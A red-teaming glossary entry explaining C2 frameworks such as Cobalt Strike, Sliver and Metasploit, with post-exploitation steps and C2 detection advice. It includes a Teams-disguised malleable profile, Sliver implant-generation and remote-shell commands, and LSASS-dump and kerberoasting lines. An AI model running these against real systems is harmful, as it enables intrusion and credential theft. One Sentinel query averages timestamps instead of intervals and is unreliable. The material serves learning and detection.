Red Teaming Glossary
C2-Framework (Command & Control)
A Command & Control (C2) framework is a tool used by red teams and penetration testers to manage communication with compromised hosts after gaining initial access to target systems. Attackers use the same techniques. Well-known frameworks include Cobalt Strike, Metasploit, Sliver, and Havoc. Understanding C2 is essential for defense and detection engineering.
Command & Control (C2) refers to the infrastructure and protocols that attackers use to remotely control compromised systems (implants/beacons) after gaining initial access. Red teams use C2 frameworks to simulate realistic APT attacks—the same techniques that real attackers employ.
C2 Architecture - Basic Principle
C2 Architecture (Modern Red Team):
┌─────────────────────┐
│ Red Team Operator │
│ (Cobalt Strike │
│ Team Server) │
└──────────┬──────────┘
│ HTTPS (Port 443)
│ encrypted, malleable C2
┌──────────▼──────────┐
│ Redirector │
│ (Apache/Nginx │
│ in the cloud) │
└──────────┬──────────┘
│ modified HTTP
│ (looks like CDN traffic)
┌──────────▼──────────┐
│ Compromised │
│ System (Beacon) │
│ Victim network │
└─────────────────────┘
Why Redirectors?
→ Direct connection Operator→Beacon → immediate IP block
→ Redirector as a buffer: Operator IP remains hidden
→ Multiple redirectors: Resilience in case of takedown
→ CDN redirectors (Cloudflare): Traffic looks "normal"Important C2 Frameworks
Cobalt Strike (industry standard for simulated APT):
→ Commercial (~$3,500/year per user)
→ Beacon: small, stable implant
→ Malleable C2 Profiles: Disguise traffic as Teams/Slack/etc.
→ Aggressor Script: Automation, custom workflows
→ Post-Exploitation: Lateral Movement, Credential Harvest
→ Very often abused by real APT groups (cracked versions!)
→ Detection: JA3 fingerprint, Beacon heartbeat pattern
Cobalt Strike Malleable C2 Example (disguised as MS Teams):
set sleeptime "3000"; # Beacon check-in every 3 seconds
set jitter "20"; # ±20% jitter (anti-beaconing detection!)
set useragent "Mozilla/5.0 ... Microsoft Teams";
http-get {
set uri "/api/v1/user/status";
client {
header "Host" "teams.microsoft.com";
header "Accept" "application/json";
metadata { base64url; prepend "token="; header "Authorization"; }
}
}
---
Sliver (Open Source, Go-based):
→ Successor to many private frameworks
→ Implants in Go (difficult for AV to analyze)
→ Protocols: mTLS, WireGuard, HTTP/HTTPS, DNS
→ Multiplayer: Team operation with multiple operators
→ GitHub: BishopFox/sliver
sliver > generate --os windows --arch amd64 \
--mtls 10.0.0.1:8888 --save /tmp/beacon.exe
sliver > mtls --lport 8888
sliver > use<session-id>
sliver (IMPLANT) > shell
sliver (IMPLANT) > upload /tmp/tool.exe C:\Windows\Temp\
---
Havoc (Open Source, Widderhorn):
→ Modern C2, released in 2022
→ Daemon (Server) + Implant (Demon.exe)
→ HTTPS listener with custom malleable profile
→ GitHub: HavocFramework/Havoc
---
Metasploit Framework (Pentest Standard):
→ Free (MSF Community) + Pro version
→ Meterpreter: powerful post-exploitation implant
→ Modules: Exploits, Auxiliary, Post, Payloads
→ msf6> use exploit/windows/smb/ms17_010_eternalblue
→ Well-known = poor evasion, but good for penetration testingPost-Exploitation via C2
Typical post-exploitation after C2 establishment:
1. Situational Awareness:
# Cobalt Strike Beacon:
whoami → current user
ipconfig → network information
net localgroup administrators → local admins
netstat -ano → open connections
ps → running processes
2. Credential Access:
→ Mimikatz via C2 (Cobalt Strike inject or execute-assembly)
→ Kerberoasting: Rubeus.exe kerberoast /outfile:hashes.txt
→ LSASS Dump: procdump64.exe -ma lsass.exe lsass.dmp
→ SAM/NTDS dump on domain controller
3. Lateral Movement via C2:
→ Pass-the-Hash: using NTLM hash on other machines
→ Pass-the-Ticket: Kerberos ticket for other services
→ SMB Lateral: PsExec-like via C2 beacon
→ WMI/DCOM: Remote execution without SMB
4. Persistence:
→ Scheduled Task: schtasks /create ...
→ Registry Run Key: HKCU\...\Run\
→ WMI Subscription: persistent trigger
→ COM Hijacking: replace existing COM objects
Hiding C2 communication:
→ Domain Fronting: Traffic runs via CDN (Azure/Cloudflare)
→ DNS over HTTPS: C2 via DoH to own DNS resolver
→ Sleeping/Jitter: Irregular beaconing
→ Process Injection: Code runs in legitimate processesDetection of C2 Traffic
C2 Detection for Defenders:
1. Beaconing detection:
→ Regular HTTPS connections to external IP
→ Exactly uniform intervals → no jitter → suspicious!
→ SIEM query (Microsoft Sentinel):
DeviceNetworkEvents
| where RemoteIPType == "Public"
| summarize ConnectionCount=count(),
AvgIntervalSeconds=avg(TimeGenerated)
by DeviceName, RemoteIP
| where ConnectionCount > 48 # More than once per hour over 2 days
| order by ConnectionCount desc
2. JA3/JA3S TLS Fingerprinting:
→ Cobalt Strike Standard JA3: 72a7c4f499754a3d7c6bbc3f2b9cfbd1
→ Suricata/Zeek automatically generate JA3
→ Threat Intel: sslbl.abuse.ch/blacklist/ja3_fingerprints/
3. HTTP Header Anomalies:
→ Malleable C2 profiles are not perfect → Anomalies detectable
→ Host header does not match SNI
→ User-Agent unusual for the endpoint
→ Content-Type does not match the payload
4. DNS indicators:
→ Domain registration < 30 days old
→ Low TTL (60s) = Fast Flux
→ Not in Alexa/Tranco Top 1M
→ High subdomain entropy = DNS tunneling
5. Detect process injection (endpoint):
→ Process opens LSASS memory (PROCESS_ALL_ACCESS)
→ svchost.exe spawns unusual child processes
→ Memory with RWX permissions in non-code areas
```</session-id>
